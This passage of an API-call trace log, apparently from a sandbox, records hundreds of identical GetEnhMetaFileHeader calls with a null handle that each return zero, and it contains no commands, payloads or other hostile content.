lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.528] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.529] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 